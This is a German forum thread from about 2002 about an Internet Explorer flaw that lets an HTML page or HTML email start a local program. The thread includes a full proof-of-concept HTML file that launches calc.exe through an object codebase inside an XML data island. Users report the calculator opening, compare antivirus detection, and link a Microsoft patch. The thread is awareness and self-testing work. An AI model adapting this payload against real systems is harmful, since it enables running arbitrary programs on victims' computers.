IE Exploit

Hallo allerseits,

seit längerem ist ein exploit für den Internet Explorer ab der Version 5.5 bekannt.

Seit kurzem kann dieser exploit auch ohne Active Scripting oder ActiveX ausgeführt werden:

http://heise.de/newsticker/data/pab-04.03.02-001/

Ist nicht ganz ohne, probiert dringend mal den Browsercheck aus:

http://www.heise.de/ct/browsercheck/e5demo10.shtml

Um das ganze lokal zu testen kopiert einfach folgenden text in einen Datei test.html:

<HTML>
<head><title>none</title></head>
<body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
   <security>
       <exploit>
           <![CDATA[
           <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
           ]]>
       </exploit>
   </security>
</xml>
</body> 
</HTML>

Einzig der Pfad in codebase zu c:/winnt/system32/calc.exe muss stimmen.

Falls der Taschenrechner hochkommt, ist das ... nicht gut ;)

Weil die Sicherheitslücke unabhängig von den Einstellungen die Interpretation von HTML-Seiten betrifft, sind auch Outlook und Outlook Express mit hohen Sicherheitseinstellungen von dem Problem betroffen. Eine einfache HTML-Mail kann somit beim Öffnen oder in der Vorschau ein Programm starten. Von Microsoft gibt es bislang noch keine Stellungnahme oder einen Patch. (pab/c't)

Das ist ja mal heftig, habe die zeilen in ein html kopiert und in ie geöffnet - dann kommt der taschenrechner hoch :eek: :eek:

Hallo zusammen.

Hab es mal ausprobiert. Klappt wirklich, und dass mein Anti-Viren-Programm und der VirenGuard, nicht angeschlagen hat, trotz dem aktuellsten Update vom 29.05.02, finde ich schon bedenklich...

Wie kann man sich davor schützen???

Gruss Micha

Sorry, habe den Fix verschlafen, hier ist er:

http://www.microsoft.com/windows/ie/downloads/critical/q321232/default.asp

Ich weiss leider nicht wie es sonst hier gehandhabt wird, deshalb einfach mal das was bei mir beim ausprobieren mit dem "Html-code" passiert ist.

Ich hab nen WinXP Pro. rechner mit IE 6 und SP1 für den IE, was aber nicht hilft soweit ich weiss... ;-)

Aber Norten AV 2003 mit neuester Virensignatur von vor 3 Tagen, hat sofort angeschlagen, als ich diese Datei nur Speicherrn wollte!!!

Gruß helpless

Hi @all:

Erstmal Danke an Lian für den Hinweis!

In der aktuellen c't steht ein ausführlicher Artikel über Sicherheitslöcher (Lücken sind das wohl nicht mehr, eher "Polen offen") und deren Bekämpfung sowie Browseralternativen.

Original geschrieben von helpless

Aber Norten AV 2003 mit neuester Virensignatur von vor 3 Tagen, hat sofort angeschlagen, als ich diese Datei nur Speicherrn wollte!!!

Aha! Das ist seltsam! Weil bei mir nix passiert ist!

Das neuste Update hatte ich auch drauf!

Mhhh sollte mir zu denken geben.

stimmt, bei mir passierte auch nix, Virendefinitionen sind nagelneu und der Taschenrechner wird ohne Probleme gestartet?!

Da sollte ich wohl doch wieder öfter mit Opera surfen?

O.K., mein Norton AV 2003 hat die datei auch beim speichern gekillt !

Beim Browser-Check passiert auch nix, Safty-first !!